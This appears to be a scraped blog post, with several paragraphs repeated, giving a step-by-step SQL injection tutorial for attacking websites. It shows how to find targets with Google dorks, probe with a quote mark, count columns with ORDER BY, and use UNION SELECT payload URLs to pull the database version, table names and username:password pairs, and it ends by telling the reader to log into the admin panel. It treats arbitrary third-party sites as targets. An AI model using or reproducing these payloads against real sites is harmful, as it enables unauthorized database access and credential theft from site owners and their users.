Hey guys! Today I'm gonna be explaining
SQL Injection and how to preform an
SQL Injection attack on a website.
Let's start off by getting an understanding
of what SQL Injection is..
SQL Injection and how to preform an
SQL Injection attack on a website.
Let's start off by getting an understanding
of what SQL Injection is..
Quote:A SQL injection attack consists of insertion or
"injection" of a SQL query via the input data from the
client to the application. A successful SQL injection
exploit can read sensitive data from the database,
modify database data (Insert/Update/Delete), execute
administration operations on the database (such as
shutdown the DBMS), recover the content of a given file
present on the DBMS file system and in some cases issue
commands to the operating system. SQL injection attacks
are a type of injection attack, in which SQL commands
are injected into data-plane input in order to effect
the execution of predefined SQL commands.
Finding A Vulnerable Target
Okay, Lets start looking for a site if you
don't already have one. You can use a
something called "Google Dorks" to find
pages of a site that may be vulnerable.
Type one of these in google to do this :
don't already have one. You can use a
something called "Google Dorks" to find
pages of a site that may be vulnerable.
Type one of these in google to do this :
Code:
Inurl:admin.php?p=
Inurl:contact.php?ID=
inurl:help.php?id=You can find many more @ http://1337mir.com/hacking/2013/10/googl...injection/
And example would be a site like : http://www.example.com/contact.php?id=6
If you already have
a site, then you can use an
sqli dumper to find the test if
any pages of the site are vulnerable
using all the google dorks
at once. This is an example of "Pen-Testing".
Testing For Vulnerabilities
Once you have found the site
you wish to sql inject, you'll obviously
need to test if it is vulnerable.. To do
this you can type ' at the end of the
url. Like this : http://www.example.com/shop.php?id=6'
If it is infact vulnerable then it will
have an error similar to "You have an error in your SQL syntax"
If that page is not vulnerable then
it shouldn't have an error code and
most likely just refresh.
you wish to sql inject, you'll obviously
need to test if it is vulnerable.. To do
this you can type ' at the end of the
url. Like this : http://www.example.com/shop.php?id=6'
If it is infact vulnerable then it will
have an error similar to "You have an error in your SQL syntax"
If that page is not vulnerable then
it shouldn't have an error code and
most likely just refresh.
Finding Column Count
Now, we need to find the amount
of columns in the site. To do this
we can use the "Order By Statement"
At the end of the link you can type order by 1/*
and keep going up 2/*,3/*,4/*, ect. until
you get an error.
of columns in the site. To do this
we can use the "Order By Statement"
At the end of the link you can type order by 1/*
and keep going up 2/*,3/*,4/*, ect. until
you get an error.
Code:
http://www.example/contact.php?id=46 order by 1/* no error
http://www.example.com/contact.php?id=6 order by 2/* no error
http://www.example.com/contact.php?id=6 order by 3/* no error
http://www.example.com/contact.php?id=6 order by 4/* no error
http://www.example.com/contact.php?id=6 order by 5/* error
Once you get that error, then you know that you
have the last links amount of columns, for the top
example, you can see that you have 4 columns
because the the last link that had an error.
have the last links amount of columns, for the top
example, you can see that you have 4 columns
because the the last link that had an error.
Checking the UNION Function
Union allows you to select more data
in one SQL statement (If I'm wrong then tell me).
So to do the UNION Function you type union all
select 1,2,3,4/* I did it up to 4 because that is
how many columns are in the site I'm attacking,
if the columns were up to 33, you would type
union all select 1,2 (Up to 33).
in one SQL statement (If I'm wrong then tell me).
So to do the UNION Function you type union all
select 1,2,3,4/* I did it up to 4 because that is
how many columns are in the site I'm attacking,
if the columns were up to 33, you would type
union all select 1,2 (Up to 33).
Code:
http://www.example.com/contact.php?id=6 Union all select 1,2,3,4/*
If the /* Dosn't work then you can just replace it with --
If you see the numbers on screen then that means the
UNION works.
If you see the numbers on screen then that means the
UNION works.
Checking For MySQL Version
Lets us check for the MySQL version. Lets us assume that on checking for
union function, we got number 3 on the screen. So for detecting the version,
we will replace number 3 of our query by @@version or version(). Like:
union function, we got number 3 on the screen. So for detecting the version,
we will replace number 3 of our query by @@version or version(). Like:
Quote:http://www.example.com/contact.php?id= 6 union all select 1,2,@@version/*
You should now have a version number. An example could be : 4.13.37
Getting table and column names
We will need to guess the table names now.
Some common table names are: admins,users,members,emails,user.
Common column names: users,user,password,pass, etc.
You can test them by entering into the link. Like :
Some common table names are: admins,users,members,emails,user.
Common column names: users,user,password,pass, etc.
You can test them by entering into the link. Like :
Quote:http://www.example.com/contact.php?id=6 Union all select 1,2,3,4 from Tablename/*
If you see the number 3 again then the
table exists, now we need the
column name. We now do this :
Quote:http://www.example.com/contact.php?id=6 Union all select 1,2,user,4 from tablename/*
If usernames are displayed then it works, if a error occurs try another column.
If the names displayed you would then look for emails, passwords, etc.
Now we want to get the usernames and passwords at the same time, to do this we use concat. (Basically it joins the strings)
If the names displayed you would then look for emails, passwords, etc.
Now we want to get the usernames and passwords at the same time, to do this we use concat. (Basically it joins the strings)
Quote:http://www.example.com/contact.php?id=6 Union all select 1,2,concat(username,0x3a,password),4 from tablename/*
0x3a is the value for ":"
Now you should get the username and password in a nice format.
Example: (User:Pass)
Example: (User:Pass)
Quote:Admin:qwerty
Now you can login to the Admin
Panel!! From here on is up to you. Thanks
for reading my tutorial. Have Fun!
Panel!! From here on is up to you. Thanks
for reading my tutorial. Have Fun!
No comments:
Post a Comment